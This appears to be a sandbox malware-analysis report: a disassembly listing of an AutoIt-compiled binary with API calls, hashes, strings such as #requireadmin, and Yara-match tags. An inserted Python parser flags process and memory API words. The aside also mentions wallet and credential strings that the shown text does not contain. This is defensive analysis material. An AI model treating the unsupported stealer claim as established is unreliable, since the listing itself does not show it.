                                          • API String ID: 2706829360-0
                                          • Opcode ID: 6541f3dba6dcd77460c5931490ea2732ed78845d49491262253673c83d52bd26
                                          • Instruction ID: 65fbbcc77fbfe5d6be036370a9e58ee9ab3b2d3cbff4621b74c7a766c0f5dc4e
                                          • Opcode Fuzzy Hash: 6541f3dba6dcd77460c5931490ea2732ed78845d49491262253673c83d52bd26
                                          • Instruction Fuzzy Hash: C9414F75E00119AFDF04DF65D888AEEBBB9EF08354F008069E955B7261CB30A959CFA0
                                          • Uniqueness Score: -1.00%

                                          APIs
                                          • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00E17A6C
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID: ArraySafeVartype
                                          • String ID:
                                          • API String ID: 1725837607-0
                                          • Opcode ID: 158bb4a0a7276bcf55285a3777d2db432d242911abdd33ce37600db7d985ab9d
                                          • Instruction ID: 963cd0428e6ccfb62b794a75946cb7cd07deb7e3cd62b3bbef72986e10ba335f
                                          • Opcode Fuzzy Hash: 158bb4a0a7276bcf55285a3777d2db432d242911abdd33ce37600db7d985ab9d
                                          • Instruction Fuzzy Hash: 49B18D7190820A9FDB00DFA4C884BFEBBF5EF49B25F205429E591F7241D734A985CBA0
                                          • Uniqueness Score: -1.00%

                                          APIs
                                          • SetWindowLongW.USER32 ref: 00DB2EAE
                                            • Part of subcall function 00DB1DB3: GetClientRect.USER32 ref: 00DB1DDC
                                            • Part of subcall function 00DB1DB3: GetWindowRect.USER32 ref: 00DB1E1D
                                            • Part of subcall function 00DB1DB3: ScreenToClient.USER32 ref: 00DB1E45
                                          • GetDC.USER32 ref: 00DECD32
                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00DECD45
                                          • SelectObject.GDI32(00000000,00000000), ref: 00DECD53
                                          • SelectObject.GDI32(00000000,00000000), ref: 00DECD68
                                          • ReleaseDC.USER32 ref: 00DECD70
                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00DECDFB
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                          • String ID: U
                                          • API String ID: 4009187628-3372436214
                                          • Opcode ID: 3f638ecadba7673721c77eb4e0c9625343d4f2d237ae803bd05416fd39880ddd
                                          • Instruction ID: d0742f661a9716c611bd7c26d3a2f70ff0cb01bd4266117b03e2bb295cf330ea
                                          • Opcode Fuzzy Hash: 3f638ecadba7673721c77eb4e0c9625343d4f2d237ae803bd05416fd39880ddd
                                          • Instruction Fuzzy Hash: AD718E31900249DFCF259F66CC84AFA7BB5FB48320F18526AFD566A265C731C892DB70
                                          • Uniqueness Score: -1.00%

                                          APIs
                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00E386FF
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID: InvalidateRect
                                          • String ID:
                                          • API String ID: 634782764-0
                                          • Opcode ID: 0ad189ae90b783e085fd2106b6ded8860e8c0507cf75cf3d7513582a194a116e
                                          • Instruction ID: a994a9ead58bd2d0dbc7db42870087b7db85bbbfd31bf04f223715c5957ade17
                                          • Opcode Fuzzy Hash: 0ad189ae90b783e085fd2106b6ded8860e8c0507cf75cf3d7513582a194a116e
                                          • Instruction Fuzzy Hash: AC51C171500348BEEB289F25CE8EFAD3FA5EB05354F602126F955F61A0CFB1A984CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadImageW.USER32 ref: 00DEC2F7
                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00DEC319
                                          • LoadImageW.USER32 ref: 00DEC331
                                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00DEC34F
                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00DEC370
                                          • DestroyIcon.USER32(00000000), ref: 00DEC37F
                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00DEC39C
                                          • DestroyIcon.USER32(?), ref: 00DEC3AB
                                            • Part of subcall function 00E3A4AF: DeleteObject.GDI32(00000000), ref: 00E3A4E8
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                          • String ID:
                                          • API String ID: 2819616528-0
                                          • Opcode ID: dbb1ef9115ae7e51b7b8cab64a6e4b399abb64575674d2a6c8f6a82698148301
                                          • Instruction ID: 3bc14560e965c0e92ca569df3821d395ef34e5a848a7e85a6d9f01898638a47d
                                          • Opcode Fuzzy Hash: dbb1ef9115ae7e51b7b8cab64a6e4b399abb64575674d2a6c8f6a82698148301
                                          • Instruction Fuzzy Hash: F8517A71A10249EFDB24EF66CC45FBA3BB5EB48310F144528F946A7290DBB0EC91DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: NULL Pointer assignment$Not an Object type
                                          • API String ID: 0-572801152
                                          • Opcode ID: 78263475504873af16ce6d73dea5a46aa884d0ae13ae6ef8c8ebbfb8e0110ae8
                                          • Instruction ID: 0143675cca247f271d6f41c13f29ed0d4b7b4d545a7fa38c78aea8b80cb1a74b
                                          • Opcode Fuzzy Hash: 78263475504873af16ce6d73dea5a46aa884d0ae13ae6ef8c8ebbfb8e0110ae8
                                          • Instruction Fuzzy Hash: FAC1A371A002299FDF14DF98E885BAEB7F5FF48314F15A429E905B7282E770AD44CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadIconW.USER32(00000000,00007F03), ref: 00E13033
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: IconLoad
                                          • String ID: blank$info$question$stop$warning
                                          • API String ID: 2457776203-404129466
                                          • Opcode ID: fc74e2ba0a6ce0b071308b37ec3d57782e0e84c4a86f88bbb8dc64150c7ab2bf
                                          • Instruction ID: c11139bbc52407123de7caf5c71457204c90c44c8c16ed7f33238466f8d18aa1
                                          • Opcode Fuzzy Hash: fc74e2ba0a6ce0b071308b37ec3d57782e0e84c4a86f88bbb8dc64150c7ab2bf
                                          • Instruction Fuzzy Hash: E1112B31788346BED7149A24EC82CEB7BDCDF2D364B10102AF900B6281DB715F8456B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00E14312
                                          • LoadStringW.USER32(00000000), ref: 00E14319
                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00E1432F
                                          • LoadStringW.USER32(00000000), ref: 00E14336
                                          • _wprintf.LIBCMT ref: 00E1435C
                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E1437A
                                          Strings
                                          • %s (%d) : ==> %s: %s %s, xrefs: 00E14357
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: HandleLoadModuleString$Message_wprintf
                                          • String ID: %s (%d) : ==> %s: %s %s
                                          • API String ID: 3648134473-3128320259
                                          • Opcode ID: 67ef65036662c7ce6658b0782e08b071ce03d9dc796080a9c532d871f8733167
                                          • Instruction ID: 03ca3dc8694a1360c2d2469906cedfd649b0c0074ef84bf9939cd83ea28a991b
                                          • Opcode Fuzzy Hash: 67ef65036662c7ce6658b0782e08b071ce03d9dc796080a9c532d871f8733167
                                          • Instruction Fuzzy Hash: 93014FF290020CBFE71197A5DE8DEEA7B6CDB08301F0005A1F749F2151EA749E894B71
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00DB2612: GetWindowLongW.USER32(?,000000EB), ref: 00DB2623
                                          • GetSystemMetrics.USER32 ref: 00E3D47C
                                          • GetSystemMetrics.USER32 ref: 00E3D49C
                                          • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00E3D6D7
                                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00E3D6F5
                                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00E3D716
                                          • ShowWindow.USER32(00000003,00000000), ref: 00E3D735
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00E3D75A
                                          • DefDlgProcW.USER32(?,00000005,?,?), ref: 00E3D77D
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                          • String ID:
                                          • API String ID: 1211466189-0
                                          • Opcode ID: e715d61a6be0810b8338b893e1e2ed7d2b2f4c0c06c122434670e8a8bb7d825c
                                          • Instruction ID: 77866ad6f98fc9e759ec33c8fc1325717a6371f0b1cc0b1bdfed85822eaefd19
                                          • Opcode Fuzzy Hash: e715d61a6be0810b8338b893e1e2ed7d2b2f4c0c06c122434670e8a8bb7d825c
                                          • Instruction Fuzzy Hash: 91B1CB71A04219EFDF14CF29D9897BD7BB1FF04705F08906AEC58AB295D730A954CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00DEC1C7,00000004,00000000,00000000,00000000), ref: 00DB2ACF
                                          • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00DEC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00DB2B17
                                          • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00DEC1C7,00000004,00000000,00000000,00000000), ref: 00DEC21A
                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00DEC1C7,00000004,00000000,00000000,00000000), ref: 00DEC286
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ShowWindow
                                          • String ID:
                                          • API String ID: 1268545403-0
                                          • Opcode ID: 5716d3fe8e64c845c152222262bdfe9017ffab0246e48e68854291ef0b8068f9
                                          • Instruction ID: 8f271f17e2e03cda98881b48a1ab414f8b6b6726b3d0cc41e454c8c43628a19a
                                          • Opcode Fuzzy Hash: 5716d3fe8e64c845c152222262bdfe9017ffab0246e48e68854291ef0b8068f9
                                          • Instruction Fuzzy Hash: C741F7336146C0DFC739AB2A8C8DBFA7B91AB85310F6C981DE187925A1C674E846D731
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DeleteObject.GDI32(00000000), ref: 00E361EB
                                          • GetDC.USER32(00000000), ref: 00E361F3
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E361FE
                                          • ReleaseDC.USER32 ref: 00E3620A
                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00E36246
                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00E36257
                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00E36291
                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00E362B1
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                          • String ID:
                                          • API String ID: 3864802216-0
                                          • Opcode ID: 4ad6ac22d01a8b5969d94448ddb01cc18f2fbdbb1fc22fd4aa5fbfe063ef9113
                                          • Instruction ID: bf0634468d14293ff9757837dc3fac3d5fc7b4c05125ef667001359bd8cc5b34
                                          • Opcode Fuzzy Hash: 4ad6ac22d01a8b5969d94448ddb01cc18f2fbdbb1fc22fd4aa5fbfe063ef9113
                                          • Instruction Fuzzy Hash: C7316F721012147FEB114F65CC8AFEB3FA9EF49755F054065FE08AA2A1C6759C41CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 127db6a1670bf4b1d4f3547e0361f74ef1fbe701f0ccb24b09c87bd500087e42
                                          • Instruction ID: c84d4597a0a0057c9cc7aa4adb00b3bf3ef2a6fdb7ba8e3f555c9619eaf320fd
                                          • Opcode Fuzzy Hash: 127db6a1670bf4b1d4f3547e0361f74ef1fbe701f0ccb24b09c87bd500087e42
                                          • Instruction Fuzzy Hash: DF716A34900109EFCB149F99CC99AFFBBB9FF85320F548159F916AA251C730AA51CBB4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • IsWindow.USER32(01569100), ref: 00E3B3EB
                                          • IsWindowEnabled.USER32(01569100), ref: 00E3B3F7
                                          • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00E3B4DB
                                          • SendMessageW.USER32(01569100,000000B0,?,?), ref: 00E3B512
                                          • IsDlgButtonChecked.USER32(?,?), ref: 00E3B54F
                                          • GetWindowLongW.USER32(01569100,000000EC), ref: 00E3B571
                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00E3B589
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                          • String ID:
                                          • API String ID: 4072528602-0
                                          • Opcode ID: 509e88db3aa844737882a1881f4d6687537753d2d3dcd4871194b0408aabf3e2
                                          • Instruction ID: f995dc7b02cfda3273334c9ce1569207718f77521fc2aa64b2b44832352241ee
                                          • Opcode Fuzzy Hash: 509e88db3aa844737882a1881f4d6687537753d2d3dcd4871194b0408aabf3e2
                                          • Instruction Fuzzy Hash: 8971D034600204EFDB24CF55C899FBABFB9EF49304F146069EA56B72A2D771A940CB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: __wcsnicmp
                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                          • API String ID: 1038674560-2734436370
                                          • Opcode ID: d0ff5db1debc6fdcbf6791f4cf42ea84d37e4b389b95c38db034b143d3f21feb
                                          • Instruction ID: d824f8c9dcc8909854f1a70cfe3d9230327e1588b4206cbab18312f864c5e799
                                          • Opcode Fuzzy Hash: d0ff5db1debc6fdcbf6791f4cf42ea84d37e4b389b95c38db034b143d3f21feb
                                          • Instruction Fuzzy Hash: BE217972214611B6C230AA34BC02FF77398EF55304F14503BF942A65D1EB919DE2C2F6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: _memset$CloseCreateHandleProcess
                                          • String ID: o$do
                                          • API String ID: 3277943733-2180341428
                                          • Opcode ID: 9fa780c539f76905b99938df8dd58a865bdca8e0fd59c4acb9e61841c2f4fb99
                                          • Instruction ID: fbb92aaf74c446a965f1992d548c71caa400c359aa48e2ca9ec4ad79cd41a09b
                                          • Opcode Fuzzy Hash: 9fa780c539f76905b99938df8dd58a865bdca8e0fd59c4acb9e61841c2f4fb99
                                          • Instruction Fuzzy Hash: 94F054B16407047EE2106F627C0AF7B3E5CEB04359F004021FA0CF6192D7754C0487B8
                                          Uniqueness

                                          Uniqueness Score: -1.00%
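The two records above (the `__wcsnicmp` routine that compares against the AutoIt `#requireadmin` / `#notrayicon` / `#OnAutoItStartRegister` directives, and the `_memset` / CreateProcess / CloseHandle routine) are the kind of entries an analyst wants to pull out of a listing this long without scrolling. The script below is an added example written for this page; it is not part of the report or of the sandbox vendor's tooling. It parses the record layout used here (API bullets, the `Similarity` fields, and the `Uniqueness Score` line that closes each record), splits the `API ID` value back into its words, and flags records whose words hit a watch-list of process/thread/memory primitives. The watch-list and the record layout are assumptions of the example; the three sample records are copied from this page, trimmed to the lines the parser reads.

```python
"""Parse the per-function records of a sandbox disassembly listing and flag the
ones whose API words hit a process/thread/memory watch-list."""
import re
from dataclasses import dataclass, field

# Assumption: record layout mirrors this page (bullets under "APIs"/"Strings",
# the "Similarity" fields, and a "Uniqueness Score" line closing each record).
API_LINE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})",
    re.M,
)
FIELD_LINE = re.compile(
    r"^\s*•\s*(?P<key>API String ID|API ID|String ID|Opcode ID):\s*(?P<val>.*)$", re.M
)
# API ID values are CamelCase words run together, frequency groups separated by
# '$', CRT names kept as '_memset' / '__wcsnicmp'.
TOKEN = re.compile(r"_+[a-z0-9]+|[A-Z][a-z0-9]*")
# Watch-list of words that mark process/thread/memory manipulation in an API ID.
# Assumption: the list is the editor's choice, not a field of the report.
WATCH = {"Process", "Thread", "Memory", "Virtual", "Context", "Remote"}


@dataclass
class Record:
    apis: list = field(default_factory=list)  # (name, module, ref, via_subcall)
    api_id: str = ""
    string_id: str = ""
    api_string_id: str = ""
    opcode_id: str = ""

    def api_tokens(self):
        """'_memset$CloseCreateHandleProcess' -> {'_memset', 'Close', 'Create', ...}"""
        return {t for grp in self.api_id.split("$") for t in TOKEN.findall(grp)}

    def strings(self):
        """Referenced strings; the report joins them with '$'."""
        return [s for s in self.string_id.split("$") if s]


def parse_records(text):
    """Split on the 'Uniqueness Score' line that closes every record."""
    records = []
    for chunk in re.split(r"^\s*Uniqueness Score:.*$", text, flags=re.M):
        if "Opcode ID" not in chunk:
            continue  # trailing whitespace or a truncated block
        rec = Record()
        for m in API_LINE.finditer(chunk):
            rec.apis.append((m["name"], m["module"], m["ref"].upper(), m["sub"] is not None))
        for m in FIELD_LINE.finditer(chunk):
            setattr(rec, m["key"].lower().replace(" ", "_"), m["val"].strip())
        records.append(rec)
    return records


def flag_records(records, watch=WATCH):
    """(record, matching words) for records whose API words intersect the watch-list."""
    return [(r, sorted(r.api_tokens() & watch)) for r in records if r.api_tokens() & watch]


def autoit_directives(records):
    """Strings shaped like AutoIt '#directive' markers (e.g. #requireadmin)."""
    return sorted({s for r in records for s in r.strings() if s.startswith("#")})


# Three records copied from this page, trimmed to the lines the parser reads.
SAMPLE = """\
• LoadIconW.USER32(00000000,00007F03), ref: 00E13033
• API ID: IconLoad
• String ID: blank$info$question$stop$warning
• API String ID: 2457776203-404129466
• Opcode ID: fc74e2ba0a6ce0b071308b37ec3d57782e0e84c4a86f88bbb8dc64150c7ab2bf
Uniqueness Score: -1.00%
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
• API String ID: 1038674560-2734436370
• Opcode ID: d0ff5db1debc6fdcbf6791f4cf42ea84d37e4b389b95c38db034b143d3f21feb
Uniqueness Score: -1.00%
• API ID: _memset$CloseCreateHandleProcess
• String ID: o$do
• API String ID: 3277943733-2180341428
• Opcode ID: 9fa780c539f76905b99938df8dd58a865bdca8e0fd59c4acb9e61841c2f4fb99
Uniqueness Score: -1.00%
"""

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for rec, hits in flag_records(recs):
        print("flag", hits, rec.api_id, "opcode", rec.opcode_id[:16])
    print("AutoIt directives:", autoit_directives(recs))
```

Run against the full listing, the same parser lets you sort records by `api_string_id` to spot the AutoIt interpreter's own boilerplate (the GUI and menu helpers that dominate this section) and concentrate on the few records whose API words or strings point at process creation, the compiled-script directives, or the wallet and credential strings reported in the signatures at the top of the page.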

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Rect$Client$Window$Screen
                                          • String ID:
                                          • API String ID: 1296646539-0
                                          • Opcode ID: 7e9c13d208bf68e1955112aa8c6a917399fd06ee7c8cd6261470686691ab7cc7
                                          • Instruction ID: addb7285a7a31c42dee1f020e854e87fd1cf518ff498dd418f76bad566f038dc
                                          • Opcode Fuzzy Hash: 7e9c13d208bf68e1955112aa8c6a917399fd06ee7c8cd6261470686691ab7cc7
                                          • Instruction Fuzzy Hash: 2CB15E7990024ADBDF10CF69C5947EEB7B1FF08310F54916AEC9A9B254DB30E950CB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _memmove.LIBCMT ref: 00E1660B
                                          • _memmove.LIBCMT ref: 00E16546
                                            • Part of subcall function 00DB9837: __itow.LIBCMT ref: 00DB9862
                                            • Part of subcall function 00DB9837: __swprintf.LIBCMT ref: 00DB98AC
                                            • Part of subcall function 00DD0DB6: _malloc.LIBCMT ref: 00DD0DCE
                                          • _memmove.LIBCMT ref: 00E165B9
                                          • _memmove.LIBCMT ref: 00E166A0
                                          • _memmove.LIBCMT ref: 00E166B9
                                          • _memmove.LIBCMT ref: 00E166D5
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: _memmove$__itow__swprintf_malloc
                                          • String ID:
                                          • API String ID: 83262069-0
                                          • Opcode ID: a9ab0f4bda76727cd03d693a561b1113fc175b014468d38349deadbb732fb169
                                          • Instruction ID: cd6ec9ebe62cc9c7b5757297dd9efa58b1441fb61efd301e19ec51a5feb76d5a
                                          • Opcode Fuzzy Hash: a9ab0f4bda76727cd03d693a561b1113fc175b014468d38349deadbb732fb169
                                          • Instruction Fuzzy Hash: 81618C3150429A9BCF01EF60CC92EFE7BA9EF45308F044559F9566B292DB34E945CB70
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _memset.LIBCMT ref: 00E12258
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E122A3
                                          • IsMenu.USER32 ref: 00E122C3
                                          • CreatePopupMenu.USER32(00E75890,00000040,745E33D0), ref: 00E122F7
                                          • GetMenuItemCount.USER32 ref: 00E12355
                                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00E12386
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                          • String ID:
                                          • API String ID: 3311875123-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
